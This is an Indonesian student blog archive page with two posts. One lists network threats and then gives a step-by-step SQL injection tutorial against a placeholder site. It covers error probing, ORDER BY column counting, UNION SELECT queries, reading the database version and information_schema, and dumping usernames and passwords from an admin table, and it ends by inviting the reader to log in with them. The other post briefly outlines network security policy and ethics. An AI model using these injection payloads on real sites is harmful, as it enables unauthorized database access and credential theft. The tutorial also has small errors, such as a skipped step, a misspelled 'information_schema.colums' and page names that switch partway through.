Recent Blog post
Archive for Agustus 2016
Ancaman dan Serangan dalam Jaringan
Ancaman & Serangan dalam Jaringan Komputer adalah Suatu Usaha dan Kegiatan Baik dari luar ataupun dalam yang dapat membahayakan keselamatan.
Serangan dalam jaringan dibagi dalam 2 macam :
1. Serangan Fisik.
2. Serangan Logic.
Contoh serangan fisik :
1. Pencurian komputer.
2. Wiretapping.
Contoh serangan logic :
1. SQL Injection.
2. Malicious Code.
3. Packet Sniffer.
SQL Injection
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke aplikasi tersebut. Berikut cara menggunakan SQL Injection.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error.
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya.
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Apa itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pakai “–“. Kalau “+” sebagai penghubung perintah.
6. Nah sampai disini langsung coba satu-satu…
http://www.target.com/berita.php?id=100+order+by+1/*
http://www.target.com/berita.php?id=100+order+by+2/*
http://www.target.com/berita.php?id=100+order+by+3/*
http://www.target.com/berita.php?id=100+order+by+4/*
Sampai muncul error
Misalkan errornya disini.
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9”
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang tampil sekarang kita pakai UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Terus perhatikan angka berapa yang keluar.
8. Misalnya angka hoki yang keluar adalah “3” maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database.
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL.
Misalnya yang kita lihat adalah table “admin”
Nah sekarang kita lihat dulu kolomnya dengan mengganti kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung saja kita lihat isinya.
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Lalu, kita bisa lihat username dan passwordnya, selanjutnya silahkan coba login.
Gikaldi Arbiyan Septuri
XII TKJ A
Ancaman dan Serangan dalam Jaringan
KEAMANAN
JARINGAN
Keamanan jaringan adalah bentuk
pencegahan atau deteksi pada hal yang bersifat gangguan dan akses tak
seharusnya pada Sistem Jaringan Komputer.
Tujuan keamanan jaringan untuk
mengantisipasi resiko jaringan komputer berupa bentuk ancaman fisik maupun
logik baik langsung ataupun tidak langsung mengganggu aktivitas yang sedang
berlangsung dalam jaringan komputer.
Kebijakan penggunaan jaringan adalah rencana atau Acuan untuk
mempengaruhi dan menentukan keputusan penggunaan Jaringan.
Kebijakan organisasi adalah suatu kebijakan instansi atau lembaga
dalam ruang lingkup keamanan jaringan untuk akses pada sistem jaringan di
tempat tersebut. Berikut kebijakannya:
•
Tata Kelola Sistem Komputer
•
Pengaturan Akses Jaringan
•
Manajemen Sumber Daya
•
Pemeriksaan Sistem Secara
Berkala
Etika menggunakan jaringan adalah suatu Penerapan Konsep benar /
salah serta sikap tanggung jawab dalam menggunakan jaringan, yaitu:
•
Memahami Akses Pengguna
•
Memahami kualitas Sumber Daya
Kebijakan mengakses komputer yaitu Kebijakan Pengguna Dalam
Mengakses Komputer. Sebagai berikut:
·
Manajemen pengguna
·
Manajemen sistem computer
·
Manajemen waktu akses
Gikaldi Arbiyan Septuri
XII TKJ A